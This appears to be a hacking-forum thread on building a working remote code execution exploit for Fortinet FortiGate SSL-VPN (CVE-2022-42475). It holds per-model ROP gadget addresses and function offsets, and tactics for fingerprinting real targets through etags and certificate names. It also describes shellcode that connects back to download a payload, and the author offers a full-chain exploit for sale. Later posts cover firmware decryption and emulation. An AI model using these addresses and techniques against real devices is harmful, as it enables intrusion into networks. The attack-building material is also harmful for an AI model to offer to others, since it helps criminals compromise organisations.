add rsp, 0x18 ; ret: 0x00000000023690b0
ret: 0x0000000001d58999
pop rax ; ret: 0x0000000002df741a
and rax, rdi ; ret: 0x000000000230e49a
pop rbx ; ret: 0x00000000021fda20
mov rdi, rax ; call rbx: 0x0000000001973581
pop rsi ; ret: 0x0000000001d5534c
pop rdx ; ret: 0x000000000272a8e6
jmp rax: 0x000000000144fa84
jmp rsp: 0x0000000002df72a2
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c4d8c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162532d
VMDK Results:
AES_set_decrypt_key: 429a60:
mprotect: 429b40:
AES_cbc_encrypt: 42bfd0:
calloc: 42c1d0:

Version: 6.4.2
Device : FGT_600D
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x000000000234fff0
ret: 0x0000000001d409a9
pop rax ; ret: 0x000000000311bd15
and rax, rdi ; ret: 0x00000000022f53da
pop rbx ; ret: 0x00000000021e4960
mov rdi, rax ; call rbx: 0x0000000001a25920
pop rsi ; ret: 0x0000000001d3d35c
pop rdx ; ret: 0x000000000270d6a6
jmp rax: 0x000000000143b9a4
jmp rsp: 0x0000000002dcc2b1
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b0c9c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000161123d
VMDK Results:
AES_set_decrypt_key: 429af0:
mprotect: 429bd0:
AES_cbc_encrypt: 42c060:
calloc: 42c260:

Version: 6.4.2
Device : FGT_600E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x0000000002284900
ret: 0x0000000000aa5cd0
pop rax ; ret: 0x0000000002f90d06
and rax, rdi ; ret: 0x0000000002229cea
pop rbx ; ret: 0x0000000002119270
mov rdi, rax ; call rbx: 0x00000000018b3a01
pop rsi ; ret: 0x0000000001c85fec
pop rdx ; ret: 0x0000000002c45a9e
jmp rax: 0x00000000013bba94
jmp rsp: 0x0000000002c6c762
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162c11c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000158c6bd
VMDK Results:
AES_set_decrypt_key: 427ae0:
mprotect: 427bb0:
AES_cbc_encrypt: 429ef0:
calloc: 42a0d0:

Version: 6.4.2
Device : FGT_601E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x000000000236cf50
ret: 0x0000000001bb467d
pop rax ; ret: 0x0000000002dfc68a
and rax, rdi ; ret: 0x000000000231233a
pop rbx ; ret: 0x00000000022018c0
mov rdi, rax ; call rbx: 0x0000000001973061
pop rsi ; ret: 0x0000000001d551ac
pop rdx ; ret: 0x0000000002dd5916
jmp rax: 0x000000000144fc24
jmp rsp: 0x0000000002dfc799
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c4f2c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016254cd
VMDK Results:
AES_set_decrypt_key: 429ab0:
mprotect: 429b90:
AES_cbc_encrypt: 42c020:
calloc: 42c220:

some gadget have none in address , its ok because they are substitutions for stack pivot gadget , so if one of theme are none in address you can try other pivot addresses

now you have the address that you may need to construct rop chain exploit , replace the address with the address that are on the poc and now you can test on the device

you should also remember that if you cant get the right software and hardware version , you should test all rop's to achieve the RCE

so if you assemble the python code that retry for every version you can achieve to rce after ~ 3000 try in maximum

BUT you have better way : you can use CVE-2024-23662 and read etag from server response and based on etag find software version of endpoint

each etag special for one software version , you can get etag , decode it simply and found software version in it

so after it you sould just try for 35 hardware version diffrent rop [ If you dont know Hwid ]

we will have some tip for finding hardware version : if endpoint use the default self signed ssl of fortinet , the device model will be appear in Common Name of certificate , so if you found FGT90D3Z13000759 for example as common name of fortigate sslvpn endpoint , the device model is 90D

now you have lower try for achieve RCE

Another point of Exploiting this vuln in real world : in the poc that post on bishop , engineer try to post request for achieve overflow , but i will advice to use socket .

connectiong to socket and send the request for endpoint to achieve overflow , if you monitor run flow in gdb , you can see different crash pop when you use post the request instead of using socket

next point will be about the shellcode that use in poc , remember that you should change it based on arch that device use , the shellcode in poc is for x86 assembly (that use on all vm instances of Fortigate) but if you want get shellcode run on arm32 , you should also change the shell code for it , also in founding rop chain and the address of functions you should use the best match version of objdump [ this software have different versions for archs ]

with all this points you can construct you own exploit code for using on real devices.

i will sell full chain exploit code for this vulnerability and cve-2023-27997 , with 3 shellcode version for different architecture , full address of ROP Chain for 2800 Software and hardware Version , also it will have scanner based on cve-2024-23662 for detecting Software Version , and pack of automatic address extractor of ROP that you can use it on every vulnerability that you need full rop addresses , for example cve-2024-21762 , contact in pm.

-----------------------------------------------------------------------------------------------------------

p.s : exploiting Xortigate (cve-2023-27997) is similar to this poc and exploit , just 1 byte after the payload you should make some change to have rce , you can use the shellcode in this topic instead of using node.js payload that use on the different articles , but in this code , ssl endpoint should sent connect back to server and try to download your final payload ( silver for example) and run it , maybe unstable sometimes and you need to try more .

p.s 2 : if you want to run Fortigate aarch64 kernel on you virtual device , you should extract flatkc (kernel file in appliance of fortigate) , binwalked the file and extract fortikernel.out from it , the edit DTB file to match hypervisor and the you can run with qemu-system-aarch64

remember that you should run u-boot from spi flash

barnaul · 14.08.2024

mkhalilovx29, awesome research. can you write some article about unpacking firmware, run in in VM and debugging process, please?

weaver · 15.08.2024

barnaul сказал(а):

mkhalilovx29, awesome research. can you write some article about unpacking firmware, run in in VM and debugging process, please?

Можно же работать с виртуальными машина или тебе это не подходит?

barnaul · 15.08.2024

weaver сказал(а):

Можно же работать с виртуальными машина или тебе это не подходит?

Мне всё подойдет, если будет результат и описание каждого шага. Хз, может я хреново ищу, но везде просто обрывки инфы, мол промежуточные вещи и так всем понятны, давайте перейдем сразу к тому шагу, где мы нашли нужный ропчейн и попали в EIP. Сидишь, такой, збс чётко! Ход мыслей не понятен, промежутные этапы не понятны. Ваще не понятна большая часть логики рассуждений реверсера, как он приходит к определенным результатам. Видимо это моё скудоумие

weaver · 15.08.2024

barnaul сказал(а):

Мне всё подойдет, если будет результат и описание каждого шага.

Такого мануала я точно не видел чтобы от и до, да и форти это Linux, поэтому ты должне обладать навыками эксплуатации уязвимостей под эту ОС. User-mode эксплуатация в частности баги которые время от времени там появляются это уязвимости в куче. Поэтому если ты плохо знаешь техники эксплуатации хипа то можешь даже и не пытаться. Потому что предположим ты сможешь воспроизвести один эксплойт, но второй уже не сможешь, потому там то будет уже другой способ эксплуатации.

Скрытый контент для пользователей: .

barnaul · 15.08.2024

Я не конкретно про фортики, а вообще в целом про фирмвари различные. Но за ссылку спасибо.

weaver · 15.08.2024

barnaul сказал(а):

Я не конкретно про фортики, а вообще в целом про фирмвари различные. Но за ссылку спасибо.

А я думал про форти эх... Ну а так работа с binwalk - если различные фирмвари
эту ссылку убили кстати как раз таки, то что я её опубликовал в паблике. Что обидно, теперь только архив орг.

mkhalilovx29 · 22.08.2024

Hi

sorry i forget to answer this topic sooner.

lets get to some explain about the forti, maybe the questions about it being answered.

setup virtual lab for testing the poc or exploits with forti is not so hard. but you should know differences between forti versions to get in the right path

for example forti firmware before 6.4.2 didnt have encryption layer on firmware , but after the 6.4.2 the encrypt them. so if you wanna play with the firmware file you should first decrypt the firmware file (if you want to do it you own , there is multiple article about it. you can found encryption keys from source and use theme , sometimes they are hardcoded and not changed in multiple firmware file)

but you can also ready made tools and scripts for this , to extract un-encrypted file out of downloaded file from internet

after that again you should now about diffrence protection mechanism in booting the firmware after change files in it.

for example in if i didnt say incorrect , in version 7.4.x fortinet implemented fgt_verify that you should pass it using some change in the file after changed and also track the booting process , and the you should set the variable use for verification manually with gdb

but the main process is same as weaver said . you should unpack the main firmware file, replace the bash file in the init folder with your busybox, and also open some ports for yourself, after that add gdb, boot the kernel and start the tests

ps 1 : you can use qemu-system-x86 for running the main kernel of fortigate firmware that madden ready for kvm , download from official website or mirrors. from there you can attach gdb with -s -S switches to fully control the debug process.

ps 2: you can also didnt change the files in the kernel. fortinet have built-in tools for debugging the received packet and manage crashes from there

b if you wanna play with the other articheture firmware file, your job is not easy as this.

if you download for example 60F firmware file , along from decrypting , you should setup the emulation lab that match the fortigate devices

this is based on diffrent things:

1 - DTB file

2 - Device booting process

3 - Kernel initialization

when you read the fortigate path for loading the devices, you will find it out that the kernel load from spi, nand, usb, sd card or etc. so you can fix the kernel in it

if you found the device save the logs on hard disk, you should attach sata hard disk to you qemu

from DTB file you will found some device part that is needed for fortiSoC . this is example of 1 fortigate device DTB file :

Код:

/dts-v1/;

/ {
    compatible = "ftnt,fsoc4";
    #address-cells = <0x2>;
    #size-cells = <0x2>;
    model = "Fortinet SOC4";

    cpus {
        #address-cells = <0x1>;
        #size-cells = <0x0>;

        cpu@0 {
            compatible = "arm,cortex-a53", "arm,armv8";
            device_type = "cpu";
            enable-method = "spin-table";
            cpu-release-addr = <0x0 0x20000000>;
            reg = <0x0>;
        };

        cpu@1 {
            compatible = "arm,cortex-a53", "arm,armv8";
            device_type = "cpu";
            enable-method = "spin-table";
            cpu-release-addr = <0x0 0x20000000>;
            reg = <0x1>;
        };

        cpu@2 {
            compatible = "arm,cortex-a53", "arm,armv8";
            device_type = "cpu";
            enable-method = "spin-table";
            cpu-release-addr = <0x0 0x20000000>;
            reg = <0x2>;
        };

        cpu@3 {
            compatible = "arm,cortex-a53", "arm,armv8";
            device_type = "cpu";
            enable-method = "spin-table";
            cpu-release-addr = <0x0 0x20000000>;
            reg = <0x3>;
        };

        cpu@4 {
            compatible = "arm,cortex-a53", "arm,armv8";
            device_type = "cpu";
            enable-method = "spin-table";
            cpu-release-addr = <0x0 0x20000000>;
            reg = <0x100>;
        };

        cpu@5 {
            compatible = "arm,cortex-a53", "arm,armv8";
            device_type = "cpu";
            enable-method = "spin-table";
            cpu-release-addr = <0x0 0x20000000>;
            reg = <0x101>;
        };

        cpu@6 {
            compatible = "arm,cortex-a53", "arm,armv8";
            device_type = "cpu";
            enable-method = "spin-table";
            cpu-release-addr = <0x0 0x20000000>;
            reg = <0x102>;
        };

        cpu@7 {
            compatible = "arm,cortex-a53", "arm,armv8";
            device_type = "cpu";
            enable-method = "spin-table";
            cpu-release-addr = <0x0 0x20000000>;
            reg = <0x103>;
        };
    };

    clocks {
        #address-cells = <0x1>;
        #size-cells = <0x0>;

        arm_timer_clk {
            #clock-cells = <0x0>;
            compatible = "fixed-clock";
            clock-frequency = <0x1e0a6e00>;
            linux,phandle = <0x2>;
            phandle = <0x2>;
        };
    };

    pmu {
        compatible = "arm,armv8-pmuv3";
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x8f 0x4 0x0 0x90 0x4 0x0 0x91 0x4 0x0 0x92 0x4>;
    };

    timer {
        compatible = "arm,armv8-timer";
        interrupt-parent = <0x1>;
        interrupts = <0x1 0xd 0xf01 0x1 0xe 0xf01 0x1 0xb 0xf01 0x1 0xa 0xf01>;
    };

    interrupt-controller@f3140000 {
        compatible = "arm,gic-400", "arm,cortex-a15-gic";
        #interrupt-cells = <0x3>;
        reg = <0x0 0xf3149000 0x0 0x1000 0x0 0xf314a000 0x0 0x2000 0x0 0xf314c000 0x0 0x1000 0x0 0xf314e000 0x0 0x2000>;
        interrupt controller;
        interrupt-parent = <0x1>;
        interrupts = <0x1 0x9 0xf04>;
        linux,phandle = <0x1>;
        phandle = <0x1>;
    };

    cci@f9000000 {
        compatible = "arm,cci-500";
        reg = <0x0 0xf9000000 0x0 0x10000>;
        ranges = <0x0 0x0 0xf9000000 0x100000>;
        #address-cells = <0x1>;
        #size-cells = <0x1>;

        pmu@10000 {
            compatible = "arm,cci-500-pmu,r0";
            reg = <0x10000 0x90000>;
            interrupt-parent = <0x1>;
            interrupts = <0x0 0xb0 0x4 0x0 0xb1 0x4 0x0 0xb2 0x4 0x0 0xb3 0x4 0x0 0xb4 0x4 0x0 0xb5 0x4 0x0 0xb6 0x4 0x0 0xb7 0x4>;
        };
    };

    aliases {
        rtc0 = "/amba/rtc@ffa60000";
        serial0 = "/serial0@fb000000";
        serial1 = "/serial0@fb001000";
    };

    serial0@fb000000 {
        compatible = "renesas,em-uart";
        reg = <0x0 0xfb000000 0x0 0x1000>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0xa 0x4>;
        clock-frequency = <0x2dc6c00>;
    };

    serial0@fb001000 {
        compatible = "renesas,em-uart";
        reg = <0x0 0xfb001000 0x0 0x1000>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0xb 0x4>;
        clock-frequency = <0x2dc6c00>;
    };

    ftmmc@f3010000 {
        compatible = "ftnt,socfpga-fsoc-mshc";
        status = "okay";
        reg = <0x0 0xf3010000 0x0 0x2000>;
        num-slots = <0x1>;
        broken-cd;
        dma-coherent;
        supports-highspeed;
        #stream-id-cells = <0x1>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x94 0x4>;
        fifo-depth = <0x400>;
        #address-cells = <0x1>;
        #size-cells = <0x0>;
        linux,phandle = <0x3>;
        phandle = <0x3>;

        slot@0 {
            reg = <0x0 0x0>;
            bus-width = <0x4>;
        };
    };

    sata@f3006000 {
        compatible = "snps,spear-ahci";
        reg = <0x0 0xf3006000 0x0 0x1000>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x90 0x1>;
        status = "okay";
    };

    usb3@f3008000 {
        compatible = "ftnt,xhci-fsoc-4";
        reg = <0x0 0xf3008000 0x0 0x8000>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x98 0x4>;
        clocks = <0x2>;
    };

    spi@fd300000 {
        compatible = "fsoc3,spi";
        reg = <0x0 0xfd300000 0x0 0x1000>;
        #address-cells = <0x1>;
        #size-cells = <0x0>;
        #cell-index = <0x1>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x0 0x4>;
        #clocks = <0x3 0x0>;
        status = "okay";

        spi-flash@0 {
            #address-cells = <0x1>;
            #size-cells = <0x1>;
            compatible = "mx66l51g45g";
            reg = <0x0>;
            ##spi-max-frequency = <0x66ff300>;
            spi-max-frequency = <0x2faf080>;

            partition@uboot {
                label = "uboot";
                reg = <0x0 0x200000>;
            };
        };
    };

    gpio@f501f500 {
        compatible = "fortinet,fsoc4-gpio";
        reg = <0x0 0xf501f500 0x0 0x100>;
        ngpios = ;
        gpio-controller;
        interrupt controller;
    };

    watchdog@fbe02000 {
        compatible = "fortinet,wdt";
        reg = <0x0 0xfbe02000 0x0 0xfff>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x5 0x1>;
        status = "disabled";
    };

    pxab@f3000000 {
        compatible = "fsoc4,pxab";
        status = "okay";
        #stream-id-cells = <0x1>;
        #address-cells = <0x3>;
        #size-cells = <0x2>;
        #interrupt-cells = <0x1>;
        device_type = "pci";
        reg = <0x0 0xf3000000 0x0 0x2000 0x0 0xf0000000 0x0 0x100000>;
        reg-names = "Csr", "Slave", "Rst";
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x10 0x4 0x0 0x11 0x4>;
        interrupt-names = "dev0", "dev1";
        linux,phandle = <0x4>;
        phandle = <0x4>;
    };

    i2c@fb004000 {
        compatible = "renesas,iic-A9mp";
        reg = <0x0 0xfb004000 0x0 0x1000>;
        #address-cells = <0x1>;
        #size-cells = <0x0>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x7 0x1 0x0 0x6 0x1>;
        clocks = <0x2>;
        clock-names = "sclk";
    };

    i2c@fb005000 {
        compatible = "renesas,iic-A9mp";
        reg = <0x0 0xfb005000 0x0 0x1000>;
        #address-cells = <0x1>;
        #size-cells = <0x0>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x9 0x1 0x0 0x8 0x1>;
        clocks = <0x2>;
        clock-names = "sclk";

        rtc@51 {
            compatible = "nxp,pcf8563";
            reg = Q;
        };
    };

    smmu@f3100000 {
        compatible = "arm,mmu-500";
        status = "okay";
        reg = <0x0 0xf3110000 0x0 0x10000>;
        #global-interrupts = <0x1>;
        calxeda,smmu-secure-config-access;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0xf 0x4 0x0 0xf 0x4 0x0 0xf 0x4 0x0 0xf 0x4 0x0 0xf 0x4 0x0 0xf 0x4 0x0 0xf 0x4 0x0 0xf 0x4 0x0 0xf 0x4>;
        mmu-masters = <0x3 0x874 0x4 0x875>;
    };

    rtc@fc700000 {
        compatible = "fortinet,fsoc4-rtc";
        reg = <0x0 0xfc700000 0x0 0x100000>;
    };

    chosen {
        bootargs = "earlycon";
        stdout-path = "serial0:115200n8";
    };

    memory {
        device_type = "memory";
        reg = <0x0 0x0 0x0 0x7c000000>;
    };
};

as you see in the code , forti devices have different components in it

i2c . sata , sdcards and ...

you should emulate theme all in you qemu command , or maybe you should sometimes need to new board definition on qemu boards . as you see in the DTB also you should choose valid gic version for it to handle the right pmu, strategy for firing cpus is declared in it, how much memory needed, and memory map for the components is the other parts of DTB files.

sometimes you will face failure after setup these also . so you should check kernel that is customized for you device. for example as i said before , in firmware file of forti (60F in this example) flatkc file act as kernel for bootup

if you using binwalk on it , you will have fortikernel.out file that act as real kernel for loading the customized kernel for fortigate devices.

iyou debug the flatkc with ghidra or ida ( use vm-to-elf to convert flatkc to elf file that you can open it in ghidra) and trace bootup process in ghidra and gdb. you will face some functions that maybe not present in default kernel files ( for example function to initiate SerDes customized for fsoc on the bootup process)

if you found out all of them sometimes you need to just bypass theme instead of emulate all of theme.

another part is after the lab is setup, you should start digging for vuln and exploit. first of all you should understand vulnerability types and difference between them

you should know if you face stack overflow , you should use different strategy with heap overflow vuln. if you want to exploit heap overflow vulnerability, you should know the heap structure and how to spray it to achieve good results. maybe you dont have this problem in stackoverflow bug

also you should know about defend mechanism of the file, ASLR, DEP, NX or any other? using of mprotect to running shellcode on forti device ( that showed in all the pocs in the internet) for it. or maybe fortinet want to use PAC in aarch64 versions ? who knows the future?

other word is about ROP chains. they are different in vast of architectures, but in the end create theme is like making puzzles. it wont match in the first tries. you should test different strategy to end the puzzle. so when you create your lab , crashed the code for the first time , extract all rops from binary , and start think theme as puzzle pieces , try to jump to your shellcode and start fun

if any question that i can answer, i will be glad to help.

-------------------------------------------------- --------------------------------------

at the end i wanna paste some notes , for everyone want to buy ANY fortigate POC or Exploit from know to end of era

please check these so stop scamming on you:

1 - if you found somebody that sell ANY forti exploit for overflow vulnerability , and dont have file with different addresses its SCAM , for every software and device model forti have different addresses and different functions , so the address file will have more than 4000 lines , or if it is hardcoded on main exploit , minimum you should have 5000 lines

2- if anybody speak about 1 exploit file for all fortis , its SCAM , fortigate use more than 2 arch for the product , so exploit should have different version for this archs and for shellcodes

3 - ask the seller 1 question [ did your exploit work on FGT-300E ] and if seller say yes , ITS SCAM , (if the seller can do it , he have 0day so it should sell with highest price

)

Remote Producing a POC for CVE-2022-42475 (Fortinet RCE)

AFANX

CD-диск

AFANX

CD-диск

DoomSlayer2002

(L2) cache

tty

floppy-диск

Premium

Premium

AFANX

CD-диск

Viktor Baletov

floppy-диск

mkhalilovx29

ripper

mkhalilovx29

ripper

barnaul

(L3) cache

weaver

31 c0 bb ea 1b e6 77 66 b8 88 13 50 ff d3

barnaul

(L3) cache

weaver

31 c0 bb ea 1b e6 77 66 b8 88 13 50 ff d3

barnaul

(L3) cache

weaver

31 c0 bb ea 1b e6 77 66 b8 88 13 50 ff d3

mkhalilovx29

ripper